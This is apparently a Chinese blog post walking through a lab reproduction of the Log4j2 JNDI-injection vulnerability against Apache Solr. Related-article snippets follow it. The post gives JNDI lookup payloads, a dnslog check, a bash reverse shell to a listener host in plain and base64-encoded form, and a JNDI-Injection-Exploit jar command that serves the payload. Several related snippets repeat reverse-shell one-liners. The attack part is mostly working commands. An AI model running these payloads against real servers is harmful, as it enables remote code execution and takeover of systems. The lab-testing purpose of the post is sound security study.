Log4j2漏洞复现

已于 2022-05-25 15:02:11 修改
阅读量3k 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
于 2022-02-16 15:46:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_46222050/article/details/122964963
版权
本文详细介绍了Log4j2漏洞的复现过程,包括环境配置、payload构造和测试、漏洞利用以及如何通过编码和反弹shell。重点展示了如何利用JNDI注入来触发漏洞,并给出了相关工具和命令的使用方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Log4j2漏洞复现

payload :

${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}
${jndi:rmi://${sys:java.version}.xxx.dnslog.cn}
${jndi:ldap://sb6vjj.dnslog.cn/exp}
1.环境配置:

靶机:kali220

vps:centos

攻击机:win10

2.测试漏洞

在这里插入图片描述

漏洞点在action参数,将poc输入之前,要现在dnslog申请一个地址。

在这里插入图片描述

构造payload:http://192.168.200.128:8983/solr/admin/cores?action=${jndi:ldap://xjgke4.dnslog.cn/exp}

在这里插入图片描述

获得回显,说明存在漏洞。

3.反弹shell

反弹shell的命令

bash -i >& /dev/tcp/vps_ip/9999 0>&1

里面的vps_ip是你要反弹shell的主机ip,9999是要监听的端口。注意了,用windos系统是弹不会shell的,因为bash -i不是windows的命令。

如我这里用的是192.168.200.133,进行编码:
编码的站点如下:

https://www.jackson-t.ca/runtime-exec-payloads.html

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2mdXOwmR-1644997111920)(C:\Users\67348\AppData\Roaming\Typora\typora-user-images\image-20220204203556105.png)]

将bash编码的复制,然后运行漏洞利用的jar文件:
下载地址:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xMzMvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.200.133"

-C是编码后的内容,-A是反弹shell的ip地址。
注意要先nc监听6666端口.

在这里插入图片描述

使用生产的payload进行攻击rmi://192.168.200.133:1099/9mxiep

在这里插入图片描述

由于多个payload ,你可以一个一个去尝试。

在这里插入图片描述

漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现
李火火的安全圈
04-28 9226
综合安防管理平台基于 统一软件技术架构 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,该漏洞可执行系统命令,可获取到目标服务器系统权限以及敏感数据信息。
JNDI-Injection-Exploit
做你想做的人,没有时间的限制,只要愿意,什么时候都可以start。
12-12 4213
JNDI-Injection-Exploit工具比marshalsec要好用的多,相当于把http服务器和协议服务器放在了一起 github地址 https://github.com/welk1n/JNDI-Injection-Exploit.git 可以下载其release下的安装包 $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。
Log4j2漏洞(一)原理和dnslog验证
02-06 2404
Log4j2漏洞(一)介绍漏洞前景、漏洞原理、确定注入点和dnslog验证
浅谈Log4j2信息泄露与不出网回显
zhoufy的博客
07-21 1162
Log4j2
Apache Log4j2漏洞复现
qq_62056583的博客
07-20 978
复现并分析【CVE-2021044228】Apache Log4j2 Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现漏洞
log4j2漏洞复现(CVE-2021-44228)
人们并不感谢罗辑
08-16 2174
log4j2是一个记录日志的日志记录框架,他存在漏洞的原因是因为反序列化导致的远程代码执行(rce)。在日志记录的过程中使用了JNDI接口,这个接口调用了lookup方法,可以远程加载java对象。如果没有对这个方法进行限制,攻击者可以构造恶意代码,从而使得服务器被getshell
Apache log4j2漏洞复现
2401_83659708的博客
06-18 446
目录步骤一启动环境步骤二检查是否存在log4j2漏洞网站:CEYE - Monitor service for security testing 将这个${jndi:ldap://lbjc0a.ceye.io},输入目标网站步骤三安装jndi注入工具,并且反弹shell1.在kali安装下列这个文件夹git clone GitHub - sayers522/JNDI-Injection-Exploit: JNDI命令注入利用2.进入目录,使用mvn工具打包2.1未进行安装的话,安装mvnapt instal
Log4j2漏洞利用
weixin_52515588的博客
12-30 1101
升级到最新的安全版本:log4j2-2.15.0-rc2。选用JNDI注入工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar。这里的命令是想要靶机运行的命令,-A 后放的是发出攻击的电脑的IP,也是存放-C后”命令”的IP地址。【我直接下载连接失败,就下载好了以后拉进来的,如果是直接下载的去对应目录下面找】在漏洞已存在的情况下,构造攻击payload执行命令反弹shell。监听界面出现反弹shell成功的界面:(进入了交互模式)实现反弹shell,可以使用命令。
Log4j漏洞环境搭建以及复现拿getshell
qq_40898302的博客
04-29 2321
环境搭建 为了实验效果,准备两台设备 kali:10.1.1.17 Windows本机:10.1.1.240 kali虚拟机安装docker环境和vulhub环境 安装方法详情:​​​​​​Vulhub - Docker-Compose file for vulnerability environment 启动docker 进入vulhub/log4j/CVE-2021-44228 启动环境(我是启动过一次,首次启动需要进行编译,需要1-2分钟左右) docker-compose u
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 3374
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
浅谈log4j2 CVE-2021-44228
kaydenlsr
09-09 873
Apache Log4j2
利用Vulhub复现log4j漏洞CVE-2021-44228
plant1234的博客
10-02 857
这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。可以利用http://www.dnslog.cn/ 申请一个dns域名进行检测。接下来要实现反弹shell,可以用命令。
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
热门推荐
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
heike_Ch的博客
08-14 3033
log4j22021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式。如何排查是否受到了攻击?检查日志中是否存在"jndi:ldap://"、"jndi:rmi//"等字符来发现可能的攻击行为,前面复现的过程在payload的构造中都出现了这样的字符串,这是攻击的典型标志。如何对log4j2的攻击进行防御?1.设置log4j2.formatMsgNoLookups=True。
log4j漏洞复现
zzf011900的博客
04-02 1036
2.0-2.14.1存在JNDI注入漏洞,导致攻击者可以控制日志内容的情况下,传入${jndi:ldap://xxxxxx.com/rce}的参数进行JNDI注入,执行远程命令。命令:bash -i > /dev/tcp/192.168.59.6/5555 2>&1 0>&1。精简版:bash -i >& /dev/tcp/192.168.59.6/5555 0>&1。/dev/tcp/192.168.59.6/5555 去连接59.6的5555端口。如:http ------web服务。
System类查看jdk版本,安装信息--Java
chenzitian6058的博客
02-01 204
@Test public void test2() { String javaVersion = System.getProperty("java.version"); System.out.println("java的version:" + javaVersion); String javaHome = System.getProperty("java.home"); System.out.println("java的home:"
log4j2漏洞复现
最新发布
11-30
2. **触发漏洞**:在正常运行的应用中,如果使用了受影响的Log4j配置,并且有相应的日志记录操作触发了对恶意URL的访问,就会激活攻击链。 3. **环境条件**:为了复现,目标系统需要有Web服务监听(例如Tomcat、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值